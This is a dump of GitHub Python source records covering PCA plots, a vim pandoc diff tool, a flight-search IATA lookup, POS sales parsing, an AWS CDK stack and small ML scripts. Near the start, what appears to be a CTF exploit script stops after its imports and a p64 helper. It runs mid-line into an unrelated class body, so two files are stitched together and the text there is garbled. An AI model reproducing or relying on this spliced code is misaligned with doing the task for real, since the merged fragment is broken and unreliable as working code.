result\nplt.plot([1,2,3,4,5,6,7,8,9], pca_var_list_2, '-o',color='r',alpha=0.7,markeredgewidth=0.0)\nplt.ylabel(\"Fraction of variance explained (F score adjusted)\")\nplt.xlabel(\"First n components\")\nplt.axhline(y=0.9, color='c', linestyle='--',alpha=0.8)\nax=plt.gca()\nax.set_ylim(0.65,1)\n\ndf3=pd.DataFrame() #df2 is the result of multiplying the 1st column of df1 by 20\nfor i in df1.columns[1:10]: #copy df1 to df3, skip the 'code' and 'class' columns\n df3[i]=df1[i]\ndf3[df3.columns[0]]*=20\npca.fit(df3)\npca_var_list_3=[]\nfor i in range(len(pca.explained_variance_ratio_)):\n if i==0:\n pca_var_list_3.append(pca.explained_variance_ratio_[0])\n else: pca_var_list_3.append(pca_var_list_3[i-1]+pca.explained_variance_ratio_[i])\n\nplt.figure() #open a new figure\n\nplt.subplot(121) #plot the the original PCA result\nplt.plot([1,2,3,4,5,6,7,8,9], pca_var_list, '-o',color='r',alpha=0.7,markeredgewidth=0.0)\nplt.ylabel(\"Fraction of variance explained\")\nplt.xlabel(\"First n components\")\nplt.axhline(y=0.9, color='c', linestyle='--',alpha=0.8)\nax=plt.gca()\nax.set_ylim(0.65,1)\n\nplt.subplot(122) #plot the modified PCA result\nplt.plot([1,2,3,4,5,6,7,8,9], pca_var_list_3, '-o',color='r',alpha=0.7,markeredgewidth=0.0)\nplt.ylabel(\"Fraction of variance explained (1st column * 20)\")\nplt.xlabel(\"First n components\")\nplt.axhline(y=0.9, color='c', linestyle='--',alpha=0.8)\nax=plt.gca()\nymin=pca_var_list_3[0]\nax.set_ylim(0.65,1)\n\nplt.show()\n","repo_name":"yzhao1849/Projects_in_Courses","sub_path":"2017 summer/Bioinformatics II/Part1 Visualization/3_dimensionality_reduction.py","file_name":"3_dimensionality_reduction.py","file_ext":"py","file_size_in_byte":5972,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"990621451","text":"#!/usr/bin/env python3\n\n\"\"\"\nThis script is designed to be run from within vim. It retrieves the filename\n(and complete path) of the current vim document, sets some options, and calls\nthe pandocConvert.py script to complete the conversion. It repeats this with\nthe version of the file checked in to git, computes a diff between them, and\ngenerates a .pdf of the result.\n\"\"\"\n\nfrom sys import argv\nfrom os import chdir, path, remove\nimport pandocConvert\nfrom subprocess import check_output, call\n\ntoFormat = 'latexraw'\ntoExtension = '.tex'\nextraOptions = ''\nbookOptions = ''\narticleOptions = ''\naddedFilter = ''\n\n\n# Get old file in git repository to diff with\ncurrentFileName = argv[1].strip('\"')\ncurrentFilePath, currentFileShortName = path.split(currentFileName)\nchdir(currentFilePath)\npandocTempDir = path.expanduser(argv[2])\nif len(argv) > 4:\n gitObject = argv[4] # To identify the old commit to diff with....\nelse:\n gitObject = '' # If empty, uses git cache\ngitPrefix = check_output(['git', 'rev-parse',\n '--show-prefix']).decode('utf-8')[:-2]\noldFileName = path.join(currentFilePath, 'gitdiff.md')\noldFileText = check_output(['git', 'show', gitObject + ':' +\n path.join(gitPrefix, currentFileShortName)])\\\n .decode('utf-8')\n\n# Create .tex file of file in git cache\npandocConvert.writeMessage('Retrieving from git cache...')\npandocConvert.writeFile(oldFileName, oldFileText)\npandocConvert.convertMd(pandocTempDir, oldFileName, toFormat,\n toExtension, extraOptions, bookOptions,\n articleOptions, addedFilter)\nremove(oldFileName) # No longer needed after conversion....\n\n# Create .tex file of current working file\npandocConvert.writeMessage('Creating .tex of working file...')\npandocConvert.convertMd(pandocTempDir, currentFileName, toFormat,\n toExtension, extraOptions, bookOptions,\n articleOptions, addedFilter)\n\n# Create texdiff file\npandocConvert.writeMessage('Creating latexdiff...')\ntempDir = path.expanduser('~/tmp/pandoc')\noldFileBaseName, null = path.splitext(path.basename(oldFileName))\ncurrentFileBaseName, null = path.splitext(currentFileShortName)\noldTexName = path.join(tempDir, oldFileBaseName + '.tex')\nnewTexName = path.join(tempDir, currentFileBaseName + '.tex')\ndiffContents = check_output(['latexdiff', '--type=FONTSTRIKE',\n '--subtype=COLOR', oldTexName,\n newTexName]).decode('utf-8')\npandocConvert.writeFile(newTexName, diffContents)\n\n# Convert to PDF\npandocConvert.writeMessage('Converting to .pdf...')\n# Note: The `False` below is `bookFlag`, which is used in runLatex to determine\n# whether makeidx will be run, and so to set an enviroment flag accordingly.\n# Setting it False here will preserve security, when I don't care whether the\n# index is being produced.\nlatexError = pandocConvert.runLatex(tempDir, currentFileBaseName,\n '-pdf', False)\nif latexError:\n pandocConvert.writeError('Error running LaTeX.')\n exit(1)\nendFile = currentFileBaseName + '.pdf'\nif path.exists('/Applications/Skim.app'):\n call(['open', '-a', '/Applications/Skim.app', '-g',\n path.join(tempDir, endFile)])\nif path.exists('/System/Library/Sounds/Morse.aiff'):\n call(['afplay', '/System/Library/Sounds/Morse.aiff'])\npandocConvert.writeMessage('Conversion complete.')\n\nexit(0)\n","repo_name":"bwhelm/vim-pandoc-mine","sub_path":"pythonx/conversion/markdown-to-LaTeX-diff.py","file_name":"markdown-to-LaTeX-diff.py","file_ext":"py","file_size_in_byte":3473,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"35986136032","text":"#!/usr/bin/env python3\nimport socket\nimport telnetlib\nimport string\nimport struct\n\nSERVER = True\n\ndef p64(x):\n return struct.pack(\" None:\n \"\"\"Initialize IataCode object\"\"\"\n # Prompt specified by Query object\n self.prompt = prompt\n # Reference for obtaining airport code\n self.all_iata_codes = self.load_iata_codes()\n self.iata_code = self.get_code()\n\n def city_choice(self, prompt: str) -> str:\n \"\"\"Gets user's input\"\"\"\n # Standardizes input\n user_input = input(f\"\\n{prompt}\\n\").capitalize()\n return user_input\n\n def load_iata_codes(self) -> dict:\n \"\"\"Load all airport cities from json file\"\"\"\n with open(\"IATA-codes.json\", \"r\") as data_file:\n raw_json = data_file.readline()\n code_repo = json.loads(raw_json)\n return code_repo\n\n def correct_spelling(self, city: str) -> str:\n \"\"\"Checks if city is in Json list\"\"\"\n return self.all_iata_codes[city][1]\n\n def multiple_options(self, city: str) -> dict:\n \"\"\"Creates dictionary of possible cities based on spelling\"\"\"\n options = {}\n count = 1\n for cities in self.all_iata_codes:\n if (len(city) < 4) and (city == cities[:len(city)]):\n options[count] = [cities, self.all_iata_codes[cities]]\n count += 1\n else:\n if cities[:4] == city[:4]:\n options[count] = [cities, self.all_iata_codes[cities]]\n count += 1\n return options\n\n def display_options(self, options: dict) -> None:\n \"\"\"Prints city options to the terminal\"\"\"\n try:\n if options == {}:\n os.system('clear')\n print(\"Couldn't find any results\")\n return self.get_code()\n else:\n print(\"Did you mean one of the following options?\\n\")\n for choices in options:\n city = options[choices][0]\n country = options[choices][1][0]\n print(f\"{choices} : {city}, {country}\")\n except:\n return self.get_code()\n\n def choice(self, options: dict) -> str:\n \"\"\"Gets User to choose city\"\"\"\n user_input = input(\"\"\"\\nChoose one of the following options\nInput reference number on the left\nOr hit enter to search again\\n\"\"\")\n try:\n return options[int(user_input)][1][1]\n except:\n print(\"That wasn't an option\")\n return self.get_code()\n\n def get_code(self) -> str:\n \"\"\"Returns airport code for city chosen by User\"\"\"\n city = self.city_choice(self.prompt)\n try:\n return self.correct_spelling(city)\n except:\n options = self.multiple_options(city)\n self.display_options(options)\n return self.choice(options)\n","repo_name":"seanremenyi/Flight-Search","sub_path":"src/IataCode.py","file_name":"IataCode.py","file_ext":"py","file_size_in_byte":2834,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"18461173526","text":"import datetime\nimport requests\nfrom dateutil.relativedelta import relativedelta\nimport calendar\nimport pandas as pd\n\n\ndef get_dates(num):\n lst = []\n\n for i in range(num, 1, 1):\n d = datetime.date.today() + datetime.timedelta(days=i)\n lst.append(d.strftime(\"%m/%d/%Y 00:00:00\"))\n return lst\n\n\ndef get_months_dates(startmonth, length, month, year):\n # This returns list of dates of specified lengths of months.\n target = datetime.date(year, month, 1)\n lst = []\n\n for h in range(startmonth, startmonth + length, 1):\n current = target + relativedelta(months=h)\n for i in range(1, calendar.monthlen(current.year, current.month) + 1):\n d = datetime.date(current.year, current.month, i)\n lst.append(d.strftime(\"%m/%d/%Y 00:00:00\"))\n return lst\n\n\ndef get_dates_from_to(startday, endday):\n # If you want to get date 30 days ago --> start = -30\n # If you want to get date until today --> 0, yesterday --> -1, two days ago --> -2.. so on\n end = endday + 2\n lst = []\n\n for i in range(startday, end, 1):\n for h in range(7, 19):\n d = datetime.date.today() + datetime.timedelta(days=i)\n lst.append(d.strftime(\"%m/%d/%Y {}:00:00\").format(h))\n return lst\n\n\ndef get_recent_week_nums():\n weeks = []\n for i in range(1, 36, 7):\n w = datetime.date.today() + datetime.timedelta(days=i)\n week = w.strftime(\"%V\")\n weeks.append(week)\n return weeks\n\n\ndef get_accesstoken(client_id, client_secret, refresh_token, client_version, token_url):\n data = {\n 'grant_type': 'refresh_token',\n 'client_id': client_id,\n 'client_secret': client_secret,\n 'refresh_token': refresh_token,\n 'client_version': client_version\n }\n resp = requests.post(url=token_url,\n json=data)\n resp_json = resp.json()\n return resp_json['access_token']\n\n\ndef get_summary_report(token, startdate, enddate):\n arr = {\n 'searchCriteria': {\n 'startDate': startdate,\n 'endDate': enddate,\n 'includedReports': [102]\n }\n }\n result = requests.post(url='https://mapi-eu.talech.com/reports/receiptssummaryreport',\n json=arr,\n headers=token)\n items = result.json()\n salesdata = json_get_sales_count(items)\n return salesdata\n\n\ndef json_get_fooditem_keys(obj):\n \"\"\"Recursively fetch values from nested JSON and extract item name and key\"\"\"\n arr = {}\n itemname = 'No name'\n itemkey = 'no-key'\n itemlabel = 'no-label'\n category = 'no-category'\n\n def extract(obj, arr, itemname, itemkey, itemlabel, category):\n \"\"\"Recursively search for values of key in JSON tree.\"\"\"\n\n def get_label(obj):\n \"\"\"This labels identify the difference of items which hold same item name\"\"\"\n l = 'no-label'\n for item in obj:\n for k, v in item.items():\n if k == 'label':\n if v != 'Tall' and v != 'Reg' \\\n and v != 'To Go' and v != 'Sit In' \\\n and v != 'Heated' and v != 'Not Heated':\n l = v\n else:\n pass\n return l\n\n if isinstance(obj, dict):\n for k, v in obj.items():\n if k == 'items':\n extract(v, arr, itemname, itemkey, itemlabel, category)\n elif k == 'productVariants':\n extract(v, arr, itemname, itemkey, itemlabel, category)\n elif k == 'modifierOptions':\n itemlabel = get_label(v)\n elif k == 'skuNumber':\n itemkey = v\n elif k == 'name':\n itemname = v\n elif k == 'categoryType':\n category = v\n arr[itemkey] = {'name': itemname, 'label': itemlabel, 'category': category}\n\n elif isinstance(obj, list):\n for item in obj:\n extract(item, arr, itemname, itemkey, itemlabel, category)\n return arr\n\n def bundle_same_items(obj, category):\n \"\"\"extract keys of items which belong to specific category\"\"\"\n arr = {}\n itemkey = None\n itemname = None\n itemlabel = None\n\n def get_similar_string(str1, str2):\n \"\"\"if str2 contains str1, return str2.\n This return str2 even words' order doesn't match\"\"\"\n count = 0\n words = str1.split(' ')\n for w in words:\n if w in str2:\n count += 1\n if count == len(words):\n return str2\n else:\n return False\n\n for key, val in obj.items():\n for k, v in val.items():\n if k == 'category':\n if v == category:\n itemkey = key\n else:\n continue\n elif k == 'name':\n if v == 'Soup & Sandwich':\n \"\"\"These items cannot be identified its sandwich name by its name.\n Instead, we need to use labels for that\"\"\"\n continue\n else:\n itemname = v\n elif k == 'label':\n if v != 'no-label':\n itemlabel = v\n else:\n pass\n\n if itemname and itemkey:\n try:\n for key, value in arr.items():\n name = get_similar_string(itemname, key)\n if name:\n k = name\n break\n arr[k].append(itemkey)\n except:\n arr[itemname] = [itemkey]\n\n elif itemlabel and itemkey:\n try:\n for key, value in arr.items():\n name = get_similar_string(itemlabel, key)\n if name:\n k = name\n break\n arr[k].append(itemkey)\n except:\n arr[itemlabel] = [itemkey]\n\n itemkey = None\n itemname = None\n itemlabel = None\n\n return arr\n\n values = extract(obj, arr, itemname, itemkey, itemlabel, category)\n lunch = bundle_same_items(values, 'LUNCH')\n baked = bundle_same_items(values, 'BAKED GOODS')\n breakfast = bundle_same_items(values, 'BREAKFAST')\n bundled = {'LUNCH': lunch, 'BAKED GOODS': baked, 'BREAKFAST': breakfast}\n return bundled\n\n\ndef json_get_sales_count(obj):\n \"\"\"Recursively fetch values from nested JSON.\"\"\"\n arr = {'BAKED GOODS': {}, 'BREAKFAST': {}, 'LUNCH': {}}\n itemkey = None\n itemvalue = None\n categoryname = None\n\n def extract(obj, arr, itemkey, itemvalue, categoryname):\n \"\"\"Recursively search for values of key in JSON tree.\"\"\"\n if isinstance(obj, dict):\n for k, v in obj.items():\n if isinstance(v, (dict, list)):\n extract(v, arr, itemkey, itemvalue, categoryname)\n elif k == 'item':\n itemkey = v\n elif k == 'soldQuantity':\n itemvalue = v\n elif k == 'categoryName':\n if v == 'LUNCH' or v == 'BREAKFAST' or v == 'BAKED GOODS':\n categoryname = v\n\n if categoryname and itemkey and itemvalue:\n arr[categoryname][itemkey] = itemvalue\n itemkey = None\n itemvalue = None\n categoryname = None\n\n elif isinstance(obj, list):\n for item in obj:\n extract(item, arr, itemkey, itemvalue, categoryname)\n return arr\n\n values = extract(obj, arr, itemkey, itemvalue, categoryname)\n return values\n\n\ndef merge_data(salesdata, itemdata):\n arr = {}\n\n for date, dailysale in salesdata.items():\n \"\"\"Create empty ditionaries for each date which contain sorted item keys\"\"\"\n arr[date] = {}\n for category, items in itemdata.items():\n arr[date][category] = {}\n for itemname, itemkeys in items.items():\n arr[date][category][itemname] = {}\n mainkey = None\n subkeys = []\n for key in itemkeys:\n if mainkey is None or len(mainkey) > len(key):\n mainkey = key\n else:\n subkeys.append(key)\n\n if mainkey:\n arr[date][category][itemname][mainkey] = subkeys\n arr[date][category][itemname]['sold'] = 0\n\n for soldcategory, solditems in dailysale.items():\n \"\"\"Find the matching keys in the array which was created earlier,\n and save sales quantity in the array\"\"\"\n for soldkey, soldnum in solditems.items():\n for soldname, soldkeys in arr[date][soldcategory].items():\n for parentkey, subkeys in soldkeys.items():\n if parentkey == soldkey:\n arr[date][soldcategory][soldname]['sold'] += soldnum\n elif isinstance(subkeys, list):\n for key in subkeys:\n if key == soldkey:\n arr[date][soldcategory][soldname]['sold'] += soldnum\n\n return arr\n\n\ndef modify_into_training_data(data):\n lst = []\n for dt, soldproducts in data.items():\n date = pd.to_datetime(dt).strftime('%m/%d/%Y')\n category = None\n name = None\n key = None\n sales = None\n for ctg, products in soldproducts.items():\n category = ctg\n for pdname, pdinfo in products.items():\n name = pdname\n for k, v in pdinfo.items():\n if k == \"sold\":\n sales = v\n elif isinstance(v, list):\n key = k\n if date and category and name and key and sales:\n lst.append({\"name\": name,\n \"key\": key,\n \"date\": date,\n \"category\": category,\n \"sales\": sales})\n\n return lst","repo_name":"miyazakimaiko/Correct-Order","sub_path":"pkg/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":10573,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"70335443452","text":"from model.usuarioModel import Usuario\n\nclass AdicionarUsuario:\n @staticmethod\n def post(nome, idade, tipoDeUsuario):\n usuario = Usuario(nome, idade, tipoDeUsuario)\n usuario.cadastrarUsuario()\n\n #pegar\nclass AtualizarUsuario:\n @staticmethod\n def get(id):\n usuario = Usuario.listarUsuarioPorId(id)\n usuario.alterarUsuario()\n print(usuario)\n\nclass DevolverUsuario:\n @staticmethod\n def get(id):\n usuario = Usuario.listarUsuarioPorId(id)\n usuario.devolver()\n print(usuario)\n\nclass ApagarUsuario:\n @staticmethod\n def get(id):\n usuario = Usuario.listarUsuarioPorId(id)\n usuario.excluirUsuario()\n\nclass ListarUsuario:\n @staticmethod\n def get():\n print(Usuario.listarUsuarios())\n\nclass BuscarUsuario:\n @staticmethod\n def get(id):\n print(Usuario.listarUsuarioPorId(id))\n","repo_name":"DanielOlint0/Biblioteca","sub_path":"controller/usuarioController.py","file_name":"usuarioController.py","file_ext":"py","file_size_in_byte":884,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"40939453614","text":"import torch\nimport torch.nn as nn\nimport torch.optim as optim\nfrom define_network import Net\n\nif __name__ == '__main__':\n _input = torch.randn(1, 1, 32, 32)\n target = torch.randn((1, 10))\n criterion = nn.MSELoss()\n\n net = Net()\n lr = 0.01\n optimizer = optim.SGD(net.parameters(), lr=lr)\n\n optimizer.zero_grad()\n output = net(_input)\n loss = criterion(output, target)\n loss.backward()\n optimizer.step()\n","repo_name":"wakame1367/pytorch_tutorial","sub_path":"Update_the_weights.py","file_name":"Update_the_weights.py","file_ext":"py","file_size_in_byte":436,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"33142230369","text":"import os\n\nfrom aws_cdk import (\n aws_dynamodb as dynamodb,\n aws_iam as iam,\n core as cdk\n)\nfrom aws_cdk.aws_dynamodb import StreamViewType\nfrom aws_cdk.aws_iam import PolicyStatement, Effect, AnyPrincipal\nfrom aws_cdk.aws_s3 import Bucket, BucketAccessControl, CorsRule, HttpMethods\nfrom aws_cdk.aws_s3_deployment import BucketDeployment, Source\nfrom aws_cdk.core import RemovalPolicy\nfrom cdk_chalice import Chalice\n\n\nclass WebApi(cdk.Stack):\n\n _API_HANDLER_LAMBDA_MEMORY_SIZE_1024 = 1024\n _API_HANDLER_LAMBDA_MEMORY_SIZE_128 = 128\n _API_HANDLER_LAMBDA_MEMORY_SIZE_256 = 256\n _API_HANDLER_LAMBDA_MEMORY_SIZE_512 = 512\n\n _API_HANDLER_LAMBDA_TIMEOUT_SHORT_SECONDS = 5\n _API_HANDLER_LAMBDA_TIMEOUT_SECONDS = 10\n\n def __init__(self, scope: cdk.Construct, id: str, **kwargs) -> None:\n super().__init__(scope, id, **kwargs)\n\n #\n # DynamoDb\n #\n partition_key = dynamodb.Attribute(name='pk', type=dynamodb.AttributeType.STRING)\n sort_key = dynamodb.Attribute(name=\"sk\", type=dynamodb.AttributeType.STRING)\n gsi1pk = dynamodb.Attribute(name=\"gsi1pk\", type=dynamodb.AttributeType.STRING)\n gsi1sk = dynamodb.Attribute(name=\"gsi1sk\", type=dynamodb.AttributeType.STRING)\n\n self.dynamodb_table = dynamodb.Table(\n self, 'WebApiTable',\n partition_key=partition_key,\n sort_key=sort_key,\n table_name=\"PyAwsV1\",\n removal_policy=cdk.RemovalPolicy.DESTROY,\n stream=StreamViewType.NEW_AND_OLD_IMAGES)\n cdk.CfnOutput(self, 'DynamoDbTableName', value=self.dynamodb_table.table_name)\n self.dynamodb_table.add_global_secondary_index(index_name=\"gsi1\", partition_key=gsi1pk, sort_key=gsi1sk)\n\n #\n # Role for lambda execution with access to dynamodb\n #\n lambda_service_principal = iam.ServicePrincipal('lambda.amazonaws.com')\n cloudwatch_logs_policy = iam.ManagedPolicy.from_aws_managed_policy_name(\n 'service-role/AWSLambdaBasicExecutionRole')\n s3_full_access_policy = iam.ManagedPolicy.from_aws_managed_policy_name(\n 'AmazonS3FullAccess')\n\n self.api_handler_iam_role = iam.Role(\n self, 'ApiHandlerLambdaRole', assumed_by=lambda_service_principal,\n managed_policies=[cloudwatch_logs_policy, s3_full_access_policy])\n self.dynamodb_table.grant_read_write_data(self.api_handler_iam_role)\n self.dynamodb_table.grant(self.api_handler_iam_role, 'dynamodb:DescribeTable')\n self.api_handler_iam_role.add_to_policy(PolicyStatement(\n resources=[\"*\"],\n actions=[\"ssm:GetParameter\", \"secretsmanager:GetSecretValue\"]\n ))\n\n #\n # Role for lambda that performs periodic task execution\n #\n self.periodic_task_iam_role = iam.Role(\n self, 'PeriodicTaskLambdaRole', assumed_by=lambda_service_principal,\n managed_policies=[cloudwatch_logs_policy])\n self.periodic_task_iam_role.add_to_policy(PolicyStatement(\n resources=[\"*\"],\n actions=[\"cloudwatch:GetMetricStatistics\", \"SNS:Publish\", \"ssm:GetParameter\"]\n ))\n self.dynamodb_table.grant_read_write_data(self.periodic_task_iam_role)\n self.dynamodb_table.grant(self.periodic_task_iam_role, 'dynamodb:DescribeTable')\n\n #\n # Role for lambda used for dynamodb stream processing\n #\n self.on_table_update_iam_role = iam.Role(\n self, 'OnTableUpdateLambdaRole', assumed_by=lambda_service_principal,\n managed_policies=[cloudwatch_logs_policy])\n self.on_table_update_iam_role.add_to_policy(PolicyStatement(\n resources=[\"*\"],\n actions=[\"ses:SendEmail\", \"logs:CreateLogGroup\", \"logs:CreateLogStream\", \"logs:PutLogEvents\",\n \"dynamodb:ListStreams\", \"dynamodb:GetShardIterator\", \"dynamodb:GetRecords\",\n \"dynamodb:DescribeStream\", \"dynamodb:DescribeTable\",\n \"dynamodb:BatchGetItem\",\n \"dynamodb:Query\",\n \"dynamodb:GetItem\",\n \"dynamodb:Scan\",\n \"dynamodb:BatchWriteItem\",\n \"dynamodb:PutItem\",\n \"dynamodb:UpdateItem\",\n \"dynamodb:DeleteItem\",\n \"ssm:GetParameter\"]\n ))\n\n #\n # Chalice config, check details for more details lambda config inside create_chalice_stage_config\n #\n web_api_source_dir = os.path.join(os.path.dirname(__file__), os.pardir,\n os.pardir, 'web-api')\n chalice_stage_config = self.create_chalice_stage_config()\n self.chalice = Chalice(self, 'WebApi', source_dir=web_api_source_dir,\n stage_config=chalice_stage_config)\n\n #\n # Users assets\n # Cloudflare manual setup required: add CNAME to DNS i.e. for in me-south-1 region:\n # name: img value: .s3.me-south-1.amazonaws.com\n #\n pyaws_domain = os.environ['PYAWS_CLI_DOMAIN']\n pyaws_image_subdomain = os.environ['PYAWS_CLI_IMAGE_SUBDOMAIN']\n pyaws_img_domain = f\"{pyaws_image_subdomain}.{pyaws_domain}\"\n img_bucket = Bucket(self, pyaws_img_domain,\n bucket_name=pyaws_img_domain,\n public_read_access=False,\n removal_policy=RemovalPolicy.DESTROY,\n access_control=BucketAccessControl.AUTHENTICATED_READ,\n cors=[CorsRule(allowed_methods=[HttpMethods.GET, HttpMethods.POST],\n allowed_headers=[],\n allowed_origins=[f\"https://{pyaws_domain}\", \"http://localhost:3000\"])]\n )\n\n img_bucket.add_to_resource_policy(permission=PolicyStatement(\n sid=f\"policy.cloudflare.sid.{pyaws_img_domain}\",\n effect=Effect.ALLOW,\n principals=[AnyPrincipal()],\n actions=[\"s3:GetObject\"],\n resources=[f\"arn:aws:s3:::{pyaws_img_domain}/*\"],\n conditions={\"IpAddress\": {\"aws:SourceIp\": [\n \"103.21.244.0/22\",\n \"103.22.200.0/22\",\n \"103.31.4.0/22\",\n \"108.162.192.0/18\",\n \"131.0.72.0/22\",\n \"141.101.64.0/18\",\n \"162.158.0.0/15\",\n \"172.64.0.0/13\",\n \"173.245.48.0/20\",\n \"188.114.96.0/20\",\n \"190.93.240.0/20\",\n \"197.234.240.0/22\",\n \"198.41.128.0/17\",\n \"199.27.128.0/21\",\n \"104.16.0.0/13\",\n \"104.24.0.0/14\"\n ]\n }}\n ))\n\n BucketDeployment(self, id=\"assetsDeployment\",\n sources=[Source.asset('./assets')],\n destination_bucket=img_bucket)\n\n\n def create_chalice_stage_config(self):\n \"\"\"Chalice config for Aws Gateway Stage and Lambda provisioning\n\n This is used by aws_cdk construct to generate whole stack from chalice app.\n Note: we use ipwhitelist.json for access control\n Note: various env variables injected into lambda and memory config\n \"\"\"\n PYAWS_CLI_DOMAIN = os.environ['PYAWS_CLI_DOMAIN']\n PYAWS_CLI_AWS_SNS_EMAIL_REGION = os.environ['PYAWS_CLI_AWS_SNS_EMAIL_REGION']\n PYAWS_CLI_IMAGE_SUBDOMAIN = os.environ['PYAWS_CLI_IMAGE_SUBDOMAIN']\n\n chalice_stage_config = {\n \"environment_variables\": {\n 'DYNAMODB_TABLE_NAME': self.dynamodb_table.table_name,\n \"DYNAMODB_STREAM_ARN\": self.dynamodb_table.table_stream_arn,\n \"PYAWS_CLI_DOMAIN\" : PYAWS_CLI_DOMAIN,\n \"PYAWS_CLI_AWS_SNS_EMAIL_REGION\": PYAWS_CLI_AWS_SNS_EMAIL_REGION,\n \"PYAWS_CLI_IMAGE_SUBDOMAIN\": PYAWS_CLI_IMAGE_SUBDOMAIN\n },\n 'api_gateway_stage': 'v1',\n \"api_gateway_policy_file\": \"ipwhitelist.json\",\n 'lambda_functions': {\n 'lambda_authorizer': {\n 'lambda_memory_size': WebApi._API_HANDLER_LAMBDA_MEMORY_SIZE_1024,\n 'lambda_timeout': WebApi._API_HANDLER_LAMBDA_TIMEOUT_SECONDS,\n 'manage_iam_role': False,\n 'iam_role_arn': self.api_handler_iam_role.role_arn,\n 'reserved_concurrency': 10,\n 'environment_variables': {\n },\n },\n 'api_handler': {\n 'manage_iam_role': False,\n 'iam_role_arn': self.api_handler_iam_role.role_arn,\n 'environment_variables': {\n },\n 'lambda_memory_size': WebApi._API_HANDLER_LAMBDA_MEMORY_SIZE_1024,\n 'lambda_timeout': WebApi._API_HANDLER_LAMBDA_TIMEOUT_SHORT_SECONDS,\n 'reserved_concurrency': 10\n },\n 'periodic_task': {\n 'manage_iam_role': False,\n 'iam_role_arn': self.periodic_task_iam_role.role_arn,\n 'lambda_memory_size': WebApi._API_HANDLER_LAMBDA_MEMORY_SIZE_128,\n 'lambda_timeout': WebApi._API_HANDLER_LAMBDA_TIMEOUT_SHORT_SECONDS,\n 'reserved_concurrency': 2\n },\n 'on_table_update': {\n 'manage_iam_role': False,\n 'iam_role_arn': self.on_table_update_iam_role.role_arn,\n 'lambda_memory_size': WebApi._API_HANDLER_LAMBDA_MEMORY_SIZE_128,\n 'lambda_timeout': WebApi._API_HANDLER_LAMBDA_TIMEOUT_SHORT_SECONDS,\n 'reserved_concurrency': 5\n }\n }\n }\n\n return chalice_stage_config\n","repo_name":"stokilo/slawomirstec.com","sub_path":"infra/stacks/web_api.py","file_name":"web_api.py","file_ext":"py","file_size_in_byte":9898,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"22225120988","text":"import numpy as np\nimport cv2\n\nfrom dataset_loader import DatasetLoader\n\nfrom constants import *\n\nfrom keras.models import load_model\nfrom quiver_engine.server import launch\n\n# Load dataset\n# Comment/uncomment to select dataset to use\ndataset = DatasetLoader()\n\n# CK Extended\ndataset.ck_extended_load_from_save()\nclasses = CK_EXTENDED_EMOTIONS\nnum_classes = len(classes)\n\nx_train, x_test = dataset.images, dataset.images_test\ny_train, y_test = dataset.labels, dataset.labels_test\n\nx_train = x_train.astype('float32')\nx_test = x_test.astype('float32')\n\n# Load model\nmodel = load_model(MODELS_PATH + 'model_ck_extended_inception_v3_1.h5')\nprint ('[+] Model loaded')\n\ncount = 0\nresult = model.predict(x_test)\nfor i in range(len(result)):\t\n\tif (classes[np.argmax(result[i])] == classes[np.argmax(y_test[i])]):\n\t\tcount += 1\n\nprint ('[+] Validation accuracy: ', count / len(result))\n","repo_name":"jorgeribeiro/filtros-ativacao-cnn","sub_path":"validate_model.py","file_name":"validate_model.py","file_ext":"py","file_size_in_byte":877,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"10007253899","text":"# -*- coding: utf-8 -*-\n\n\n# Standard library\nimport logging\nfrom pathlib import Path\nimport os\n\n# 3rd party packages\n# import click\n\n# Local source\nfrom src.data.stock_io import read_time_series, write_time_series\n\n\n# @click.command()\n# @click.argument('input_file', type=click.Path(exists=True))\n# @click.argument('output_file', type=click.Path())\ndef main(input_file, output_file):\n \"\"\" Runs data processing scripts to turn raw data from (../raw) into\n cleaned data ready to be analyzed (saved in ../processed).\n \"\"\"\n logger = logging.getLogger(__name__)\n logger.info('making final data set from raw data')\n raw_data = read_time_series(input_file)\n write_time_series(raw_data, output_file)\n\n\nif __name__ == '__main__':\n log_fmt = '%(asctime)s - %(name)s - %(levelname)s - %(message)s'\n logging.basicConfig(level=logging.INFO, format=log_fmt)\n\n # Often useful for finding various files\n project_dir = Path(__file__).resolve().parents[2]\n\n raw_data_path = os.path.join(project_dir, \"data\", \"raw\", \"AAPL.csv\")\n processed_data_path = os.path.join(project_dir, \"data\", \"processed\", \"AAPL.csv\")\n main(raw_data_path, processed_data_path)\n","repo_name":"cdaksha/trading_agent","sub_path":"src/data/make_dataset.py","file_name":"make_dataset.py","file_ext":"py","file_size_in_byte":1179,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"4335816741","text":"from utils.annotation_parsing import parse_pascal_voc_groundtruth, write_darknet_labels\nimport os\n\nLABEL_DIR='/home/nhat/darknet-finetune/IDOT_dataset/labels'\nIMG_DIR='/home/nhat/darknet-finetune/IDOT_dataset/images'\n\nif LABEL_DIR is None:\n LABEL_DIR = os.getcwd()\n\nframes = parse_pascal_voc_groundtruth('IDOT_dataset/xml')\nwrite_darknet_labels(LABEL_DIR, frames, ['vehicle', 'people'])\n\ntrain_set = open('IDOT_dataset/train_index.txt').read().splitlines()\ntest_set = open('IDOT_dataset/test_index.txt').read().splitlines()\nf_train = open('IDOT_dataset/train.txt', 'w')\nf_test = open('IDOT_dataset/test.txt', 'w')\n\nfor fn in train_set:\n f_train.write('{}\\n'.format(os.path.join(IMG_DIR, '{}.jpg'.format(fn))))\n\nfor fn in test_set:\n f_test.write('{}\\n'.format(os.path.join(IMG_DIR, 